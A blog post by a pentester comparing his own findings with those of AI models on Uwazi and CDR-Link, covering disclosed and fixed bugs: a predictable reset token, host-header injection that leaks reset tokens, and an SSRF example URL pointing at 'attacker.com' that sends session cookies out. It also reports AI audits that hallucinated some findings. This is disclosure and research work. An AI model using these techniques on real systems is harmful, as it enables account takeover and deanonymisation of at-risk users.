What AI Found and What It Missed

10 minute read

Yesterday, the second Open Technology Fund pentest I have done was published. That means I can finally share some results of my exploration at the intersection of AI and security, namely using AI for pentesting!

Background

First, a brief background. During 2024 I conducted two pentests (manually, no AI) of open source applications via Open Technology Fund. The first one was Uwazi (report available), a security critical system for managing eyewitness videos, testimonies, and other human rights documentation for human rights defenders, Journalists, activists, and researchers. Uwazi had been pentested three times previously.

One of the discovered vulnerabilities was a zero click account takeover via a password reset flaw. The fundamental issue was that the reset token was generated by hashing the email and the current unix time stamp, which meant that the attacker only had to try resetting the password using every possible unix time stamp from when they sent the password reset request to when they received the response from the server. In practice this means a few hundred attempts, which translates to a few seconds. When the right token value was tried, the attacker could set the password of the account to whatever they wanted.

The vulnerable code. Note line 291 where the token is generated

The vulnerable code. Note line 291 where the token is generated

The idea

Schematic showing the idea

The attack in action!

The account takeover via password reset

The second system we pentested was CDR-Link (report available), a secure, open source help desk application for organizations that run digital security help desks for communities facing authoritarian censorship and surveillance. The helpdesks run via Signal, Telegram, and WhatsApp channels, and provide organizations with a dashboard from which they can streamline responses to support requests. I will dig into the most critical vulnerability we found, a zero click account takeover via SSRF later in the post.

Disclosure: The vulnerability that I missed

Part of my exploration into using AI for security has focused on vulnerability research, or pentesting. Specifically I have been interested in what the limit is for frontier AI models in discovering vulnerabilities in code. To really dig into it, I decided to scan open source applications that I have pentested (specifically the commit I pentested) since I know the code and what vulnerabilities they hold. One of the systems was Uwazi.

I scanned the system using a pentesting harness I built, and it did find most vulnerabilities from the pentest. I must say, I was surprised and really impressed! I looked specifically at the findings related to the password reset functionality, and it had found the same critical issue with the predictable reset token. But on top of that, it had discovered one more critical issue.

Technical details

Looking back at the code for the password reset, the function is called with a domain variable that flows into conformRecoverText()

Uwazi password reset again

Uwazi password reset again

In conformRecoverText(), it is used to create the URL in the email that gets sent to the user whose password is being reset.

Uwazi password reset email generation

Uwazi password reset email generation

This means that if domain is attacker controlled, they can add their own domain instead of the Uwazi one. If the user clicks the link in the email, the reset token gets sent to the attacker server.

But, surely this variable is defined from an environment variable or something? It turns out, if you trace the calls backwards, it comes from the host header in the request.

Uwazi password reset email generation

Domain gets created from the host header

This means an attacker could simply send a password reset request for another user with an attacker controlled domain in their host header. The victim would recieve the legitimate looking Uwazi email, but clicking the link would compromise their account.

Digging further into it, it turns out the same pattern existed for the login lockout functionality. Making six failed login attempts (wrong password or MFA) locks the account and sends an email to the owner with a link to unlock their account.

Account lockout email sender function. Note HTML

Account lockout email sender function. Note HTML

This is more or less the same thing, with the attacker controlled domain variable getting embedded in the email. There is one important difference though. This email is sent as HTML content. That means we can use the domain variable to inject HTML which opens up to more possible attacks. More importantly, it allows us to add a tracking pixel which fires as soon as the victim opens the email, leaking their IP address and user agent. Since Uwazi is used by whistle blowers and human rights advocates in a hostile environment, anything that helps an adversary identify the users is critical.

Summary

Two host header injections were discovered that allow an attacker to send emails containing malicious content. One allows overwriting the domain of the password reset URL, containing the password reset token. The other allows injecting arbitrary HTML which is rendered when the user opens the email (typically JavaScript is not rendered in email clients so no XSS), which could help an adversary deanonymize a user.

This is something we, and pentesters before us, missed when pentesting the application. Yet, the vulnerabilities themselves are not very complex so it begs the question: why did we miss it?

As a pentester, you have limited time so you can’t dig into everything. You must make educated guesses on where to best spend your time. Speaking for myself, the simple reason I missed this is because I tacitly assumed that the domain variable did not originate from the user. Had the variable been named host instead, for example, I am sure it would have triggered any pentesters spider sense.

Disclosure process

I reached out to Uwazi and disclosed the vulnerabilities on the 17th of March. They swiftly addressed the issues and graciously gave me permission to disclose the vulnerabilities. A big kudos to the team for their speed and transparency.

The vulnerability that AI missed

So is that it? AI is simply better at finding vulnerabilities than humans and we should spend our time doing something else? I kept scanning code, trying to learn more about the limits of it. I tried scanning CDR Link, another open source project I had pentested (report available). One of the vulnerabilities we found was a zero click account takeover via SSRF.

Technical details

The CDR-Link system utilizes another system, Zammad, for some of its functionality. How this worked in practice was that if a user sends a request to https://cdr-link.com/zammad/hello, it would be passed along to http://zammad-nginx:8080/hello internally. so to generalize, we have the pattern https://cdr-link.com/zammad{INPUT} which the server sends to http://zammad-nginx:8080{INPUT}.

Code in middleware.ts that rewrites the URL. The rewriteURL() function simply replaces the linkBaseURL with the zammadURL

Code in middleware.ts that rewrites the URL. The rewriteURL() function simply replaces the linkBaseURL with the zammadURL

Note that the headers are passed along to the rewriteURL() function. That is because the user needs to be authenticated in the Zammad system, too, so headers including session cookies are added to the request. Also note that the attacker controls more than just the path; there’s no slash between the port and {INPUT}. Had the rewrite produced http://zammad-nginx:8080/{INPUT} instead, only the path would be attacker-controlled, and this wouldn’t be exploitable. But because it produces http://zammad-nginx:8080{INPUT}, the attacker can inject characters that change the host itself. The attacker can abuse this by sending the request:

https://cdr-link.com/zammad@attacker.comwhich will get rewritten to http://zammad-nginx:8080@attacker.com, which is treated as a basic authentication request to attacker.com. Ergo, this is an SSRF. If we were to convince a user to click this link, their session cookies would be sent to the attacker. In the test, we found an HTML injection in the ticket creation, allowing the injection of an iframe so that the victim’s browser would send the request when they open the ticket, so no click was necessary.

Attempts with AI

When I scanned CDR Link with the pentesting harness, it didn’t find the rewrite vulnerability. At first, I suspected the harness was to blame, so I decided to manually guide an agent to the vulnerability to see what data it needed to find it.

Claude Sonnet 4.6

I tried with Claude Sonnet 4.6. I ran it inside the CDR Link repo and asked it to audit the repo for vulnerabilites. I gave it a series of hints to guide it to the vulnerability:

Audit the repo, start with the middleware file There is another critical issue in the middleware file Look at lines 41-42 (vulnerable lines of code) It has to do with /zammadxyz appending xyz to the destination URL

At the end of all that, Sonnet still couldn’t find the vulnerability. It listed a bunch of other vulnerabilities, most of which were either true but intended, like running the application in SETUP MODE disabling authentication, or plain hallucinations. The one real, interesting vulnerability it found was a legitimate host header injection (once again!), but that issue had been closed by the fix that fixed the rewrite vulnerability I covered earlier.

So in short, Sonnet 4.6 failed to find the vulnerability despite being given absurd levels of guidance, far surpassing what any harness could reasonably do.

Claude Opus 4.7

During my wait to disclose, Claude Opus 4.7 was released. I gave it a go at the same vulnerability, gradually ramping up the hints in the same way:

Audit the repo, start with the middleware file

Here it actually flags the issue but fails to see the security impact:

H2. path.startsWith(...) prefix checks are over-broad

  Where: middleware.ts:41, 43, 97, 101.

  What:
  - startsWith("/zammad") matches /zammadxyz — the subsequent
  request.url.replace(linkBaseURL + "/zammad", zammadURL) then produces
  malformed hostnames (e.g. http://zammad-nginx:8080xyz/...) that new URL() will
   throw on. 500s, not exploit, but brittle.
  - zammadPaths.some(p => pathname.startsWith(p)) matches /assetsfoo, /cablefoo,
   etc., all forwarded to Zammad.
  - startsWith("/login") matches /login-anything and permits it unauthenticated.
  - startsWith("/admin") is OK as-is, but note it only protects the literal
  /admin prefix — admin functionality placed under any other path has no
  middleware protection.
  

There is another critical issue in the middleware file

It found that the application was vulnerable to CVE-2025-29927 which was true, but unsurprising since I was scanning a commit from 2024. The issue had been fixed, so the current version of the application did not have this vulnerability.

Look at the redirects

It flagged the host header injection that Sonnet also found.

The rewrites have another issue, look deeper

It basically got stuck and listed everything it had “ruled out”. Among them, it mentioned the /zammadxyz issue, and asked for further hints.

Dig into the /zammadxyz

After much guidance, Opus finds the vulnerability!

After much guidance, Opus finds the vulnerability!

And it finally found the vulnerability! To its credit, when it found the vulnerability it accurately explained the impact and remediation recommendation.

So Opus 4.7 did find the issue, but originally ruled it out despite repeated prompts to dig deeper. It had to be given absurd levels of guidance to succeed. I am sceptical that a human or harness that did not already know about the vulnerability would be able to provide that.

Full chat logs available at Github: Sonnet, Opus.

Conclusion

Based on my exploration, I think it is clear that AI can provide a lot of value when it comes to discovering vulnerabilities. It can find issues that pentesters typically miss because of assumptions made under time pressure.

However, current frontier models are not good enough to replace humans. Instead, I think AI assisted pentesting is the way to go.

There are some challenges to solve:

Pentesting inherently deals with secret information, such as closed source code and of course the vulnerabilities themselves. We need to use AI in a way that doesn’t compromise the customer. Either that can be done by running open source AI models on infrastructure we own, or we need to sign an agreement with an AI vendor with guarantees, and have the customers approve of us sending their data to the AI vendor.
In the ideal world, we would grow confident in the ability of the AI and harness to find certain classes of vulnerabilites, and notice it lacking in other areas. If one could identify these with some consistency, the human could spend most of their time in the areas where the AI performs poorly and just do a quick pass over the areas where AI excel. If that is possible, huge gains in speed would be possible while preserving or raising the confidence in the findings.

I think the possible gains brought by AI warrant solving the challenges above. It will be really interesting to see how pentesting firms do so.

Thanks

A big thank you to Uwazi for allowing me to disclose the vulnerability! Having dealt with them, they are a super professional team who really prioritize securing their systems. Truly a delight to work with.

My friends at Assured also deserve a big thank you for giving me the opportunity to pentest these systems in the first place.

Dennis Dubrefjord

What AI Found and What It Missed

Background

Disclosure: The vulnerability that I missed

Technical details

Summary

Disclosure process

The vulnerability that AI missed

Technical details

Attempts with AI

Claude Sonnet 4.6

Claude Opus 4.7

Conclusion

Thanks

You May Also Enjoy